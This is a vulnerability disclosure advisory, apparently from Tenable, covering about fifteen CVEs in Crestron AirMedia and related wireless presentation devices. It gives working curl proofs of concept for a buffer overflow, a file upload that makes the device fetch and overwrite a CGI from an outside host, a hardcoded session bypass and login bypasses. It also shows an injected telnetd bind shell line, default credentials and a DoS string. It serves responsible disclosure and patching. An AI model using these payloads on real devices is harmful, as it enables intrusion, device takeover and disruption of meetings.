### Synopsis
Tenable found multiple vulnerabilities while investigating a Crestron AM-100. Tenable also discovered that the Crestron AM-100 shared a code base with the Barco wePresent, Extron ShareLink, InFocus LiteShow, TEQ AV IT WIPS710, SHARP PN-L703WA, Optoma WPS-Pro, Blackbox HD WPS, and possibly others. The vulnerabilities listed below do not affect all devices. Tenable has done its best to specifically call out which platforms are affected by each vulnerability.
### CVE-2019-3925: SNMP Command Injection #1
A remote, unauthenticated attacker can inject operating system commands on the Crestron AM-100 with firmware 1.6.0.2 and AM-101 with firmware 2.7.0.2. The vulnerability occurs over SNMP via the iso.3.6.1.4.1.3212.100.3.2.9.3 OID. The command injection is the result of shelling out to /bin/ftpfw.sh.
![](https://images.seebug.org/1560151460666-w331s)
### CVE-2019-3926: SNMP Command Injection #2
A remote, unauthenticated attacker can inject operating system commands on theCrestron AM-100 with firmware 1.6.0.2 and AM-101 with firmware 2.7.0.2. The vulnerability occurs over SNMP via the iso.3.6.1.4.1.3212.100.3.2.14.1 OID. The command injection is the result of shelling out to /bin/getRemoteURL.sh.
![](https://images.seebug.org/1560151474424-w331s)
### CVE-2019-3927: Unauthenticated Admin Password Change via SNMP
A remote, unauthenticated attacker can change the admin and moderator passwords for the web interface on the Crestron AM-100 with firmware 1.6.0.2 and AM-101 with firmware 2.7.0.2. The vulnerability occurs over SNMP via the iso.3.6.1.4.1.3212.100.3.2.8.1 and iso.3.6.1.4.1.3212.100.3.2.8.2 OIDs. The following proof of concept shows the user logging in with the default "admin" password and then with the a new password.
![](https://images.seebug.org/1560151486822-w331s)
### CVE-2019-3928: Presentation Code Leak via SNMP
A remote, unauthenticated attacker can acquire the presentation code on the Crestron AM-100 with firmware 1.6.0.2 and AM-101 with firmware 2.7.0.2. The vulnerability occurs over SNMP via the iso.3.6.1.4.1.3212.100.3.2.7.4. The code allows the attacker to view locked presentations or become a presenter.
![](https://images.seebug.org/1560151499935-w331s)
### CVE-2019-3929: Unauthenticated Remote Command Injection via HTTP
A remote, unauthenticated attacker can execute operating system commands as root via crafted requests to the HTTP endpoint file_transfer.cgi. This vulnerability appears to affect all known devices including the Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000 firmware 2.3.0.10, Barco wePresent WiPG-1600 before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7
![](https://images.seebug.org/1560151515939-w331s)
### CVE-2019-3930: Unauthenticated Remote Stack Buffer Overflow via HTTP
The function PARSERtoCHAR in libAwCgi.so is called by the HTTP cgi scripts in multiple contexts. Sometimes without authentication (file_transfer.cgi) and sometimes with authentication (return.cgi). CGI scripts that pass this function input that exceeds 0x100 bytes overflow a stack buffer. The following proof of concept shows a remote, unauthenticated attacker triggering this bug.
```
curl -v --header "Content-Type: application/x-www-form-urlencoded" \
--request POST \
--data "file_transfer=new&dir=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaPa_NoteaaaaaaaaaaaaaaPa_Noteaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
--insecure https://192.168.88.250/cgi-bin/file_transfer.cgi
```
Which generates the following back trace:
```
Core was generated by `/home/boa/cgi-bin/file_transfer.cgi'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x61616160 in ?? ()
(gdb) bt
#0 0x61616160 in ?? ()
#1 0x4003ffc4 in replace () from /lib/libAwCgi.so
#2 0x61616160 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb)
```
This vulnerability appears to affect all known devices including the Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000 firmware 2.3.0.10, Barco wePresent WiPG-1600 before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7.
### CVE-2019-3931: Authenticated Remote File Upload via HTTP
The Crestron AM-100 1.6.0.2 and AM-101 2.7.0.1 received a patch to fix CVE-2017-16709. The patch attempted to filter out operating system commands to prevent command injection. However, this patch was not entirely successful and authenticated attackers can still provide arbitrary parameters to curl. This allows authenticated attackers to upload any file to the device. Furthermore, the /home/boa/cgi-bin/ directory is writeable which allows the attacker to easily achieve code execution.
The following proof of concept:
```
curl --header "Content-Type: application/x-www-form-urlencoded" \
--request POST \
--data "command=<Send><seid>fAEI0CHTDTHKcDVD</seid><upload><protocol>ftp</protocol><address>http://192.168.88.248:1270Pa_Note http://192.168.88.248:1270/lol.cgi -o /home/boa/cgi-bin/file_transfer.cgi</address><port>1270</port><account>lol</account><password>lol</password><logo>/tmp/wat</logo></upload></Send>" \
--insecure https://192.168.88.250/cgi-bin/return.cgi
```
Will cause the following command to be executed on the device:
```
sh /usr/bin/curl -k -o /tmp/Example.ogg http://192.168.88.248:1270; http://192.168.88.248:1270/lol.cgi -o /home/boa/cgi-bin/file_transfer.cgi
```
Where lol.cgi is the file to upload and file_transfer.cgi is the file to overwrite
### CVE-2019-3932: Authentication Bypass in return.tgi
The return.tgi script in /home/boa/tgi/ allows remote attackers to bypass authentication with a hardcoded sessionID of trLVy9Gh82KDHoy on the Crestron AM-100 with firmware 1.6.0.2 and AM-101 with firmware 2.7.0.2. The return.tgi controls external devices via the uart_bridge. A sample bypass follows:
```
curl --header "Content-Type: application/x-www-form-urlencoded" \
--request POST \
--data "command=session&trLVy9Gh82KDHoy9&beef100500 2222010005"
--insecure https://192.168.88.250/tgi/return.tgi
```
### CVE-2019-3933: Remote View Login Bypass #1
An unauthenticated, remote attacker can bypass the remote view "login" (pictured in CVE-2019-3928) simply by navigating to http://[ip address]/images/browserslide.jpg. The final image of a screenshare will also be cached at that location even after the presentation has finished. If a presentation has not occurred since a reboot then this page will be a 404. This vulnerability is known to affect the Crestron AM-100 firmware 1.6.0.2 and Crestron AM-101 firmware 2.7.0.1.
![](https://images.seebug.org/1560151577316-w331s)
### CVE-2019-3934: Remove View Login Bypass #2
An unauthenticated, remote attacker can bypass the remote view "login" (pictured in CVE-2019-3928) and down slide images by executing the following HTTP request:
```
curl --header "Content-Type: application/x-www-form-urlencoded" \
--request POST \
--data "BROWSER=client" \
--insecure "https://192.168.88.250/cgi-bin/login.cgi?lang=en&src=lol.html" > slideshow_img.jpg
```
This vulnerability is known to affect the Crestron AM-100 firmware 1.6.0.2 and Crestron AM-101 firmware 2.7.0.1
### CVE-2019-3935: Unauthenticated Remote Moderator Controls
An unauthenticated, remote attacker can stop, start, and disconnect any screen sharing session due to insufficient authentication checking in the moderator controls. The following commands demonstrate this functionality in the Crestron AM-100 firmware 1.6.0.2 and Crestron AM-101 firmware 2.7.0.1. Note that the first request provides the attacker with the "primary key" for the screen share session.
```
albinolobster@ubuntu:~$ curl --header "Content-Type: application/x-www-form-urlencoded" --request POST --data "conference" --insecure "https://192.168.88.250/cgi-bin/conference.cgi?lang=en&src=lol.html"
3000192.168.88.24741
albinolobster@ubuntu:~$ curl --header "Content-Type: application/x-www-form-urlencoded" --request POST --data "userid=4&action=Stop" --insecure "https://192.168.88.250/cgi-bin/conference.cgi?lang=en&src=lol.html"
success
albinolobster@ubuntu:~$ curl --header "Content-Type: application/x-www-form-urlencoded" --request POST --data "userid=4&action=PlayImage" --insecure "https://192.168.88.250/cgi-bin/conference.cgi?lang=en&src=lol.html"
success
albinolobster@ubuntu:~$ curl --header "Content-Type: application/x-www-form-urlencoded" --request POST --data "userid=4&action=Disconnect" --insecure "https://192.168.88.250/cgi-bin/conference.cgi?lang=en&src=lol.html"
success
```
### CVE-2019-3936: Unauthenticated Remote View Denial of Service
An unauthenticated, remote attacker can stop a screen share by sending the string wppcmd\x00\x00\xa0\x00\x00\x00 to TCP port 389. The request takes about 2 minutes to go through, but after that time period the screen share transitions into the "Stopped" state.
### CVE-2019-3937: Credentials Stored in Plaintext
The file /tmp/scfgdndf stores usernames, passwords, and more in plaintext. Maybe under normal circumstances this wouldn't be too concerning, but with multiple unauthenticated vulnerabilities affecting the devices, including a file inclusion vulnerability, this becomes more concerning. The following is a sample of the files contents. Note that "modpass" and "adminpass" were the passwords in use at the time of dumping this file.
```
/tmp # strings /tmp/scfgdndf
WPS820 100111101110001
Crestron AirMedia
WiPG1K5s
8888
#FFFFFF
AirMedia-0e58c9
default
AM-100
user
trainer
admin
sh -b 0.0.0.0:1270
private
user
authpass
privpass
public
GMT-8_CH
0.0.0.0
modpass
adminpass
http://192.168.88.253:1270;telnetd -l /bin/sh -b 0.0.0.0:1270
```
This vulnerability is known to affect the Crestron AM-100 firmware 1.6.0.2 and Crestron AM-101 firmware 2.7.0.1.
### CVE-2019-3938: Exported Credentials Recoverable
The platform allows the administrator to export and import configuration files. The device stores user credentials in the configuration file. The configuration file is easily decoded using the vendor's awenc tool. After decoding, the admin password is revealed ("lolwat" in the PoC below). This vulnerability is known to affect the Crestron AM-100 firmware 1.6.0.2 and Crestron AM-101 firmware 2.7.0.1.
```
albinolobster@ubuntu:~$ sudo chroot . ./qemu-arm-static /bin/awenc -h
Encode / Decode files with awenc
Usage: awenc [OPTION]
-i; --input [FILENAME]: Input file
-o; --output [FILENAME]: Output file
-d; --decode: Do Decode
-e; --encode: Do Encode
-g; --get: Get Header
-h; --help: Print this message
albinolobster@ubuntu:~$ sudo chroot . ./qemu-arm-static /bin/awenc -d -i ./System.conf -o ./out
AWENC [0:29:38.124] -- AWDEC: file operation start
AWENC [0:29:38.127] -- finish check original head.
AWENC [0:29:38.128] -- Start Enc / Dec
AWENC [0:29:38.129] -- FILE_OPERATION END
AWENC [0:29:38.129] -- finish check restored head.
AWENC [0:29:38.129] -- AW_DEC: finish create file.
albinolobster@ubuntu:~$ cat out | grep PWD
<?xml version="1.0" encoding="utf-8"?><awapi web_index="WEB_DOWNLOAD_PWD"
value="" /><awapi web_index="WEB_TRAINER_PWD" value="" /><awapi
web_index="WEB_ADMIN_PWD" value="" /><awapi web_index="PREF_LOGINCODE"
value="0" /><awapi web_index="LONG_TRAINER_PWD" value="moderator" /><awapi
web_index="LONG_ADMIN_PWD" value="lolwat" /><awapi
```
### CVE-2019-3939: Default Credentials
The devices use the default credentials "admin:admin" for the admin user and "moderator:moderator" for the moderator user.
### CVE-2017-16709: Authenticated Command Injection
In June 2018, Crestron patched an authenticated, remote command injection vulnerability which was assigned CVE-2017-16709. Through patch analysis, Tenable believes this vulnerability is a command injection via HTTP. Analysis of the other devices indicated they had not patched this vulnerability.
### Solution
At the time of publication, Barco has released firmware updates for their WiPG-1000P and WiPG-1600W systems. Extron has also published a firmware update. Finally, Crestron has released an advisory on their Security Advisory page.
We are not aware of any other patches at this time.
Contact your vendor for further information. As a general mitigation technique, never expose your IoT device to the internet and host IoT devices on their own network whenever possible.
暂无评论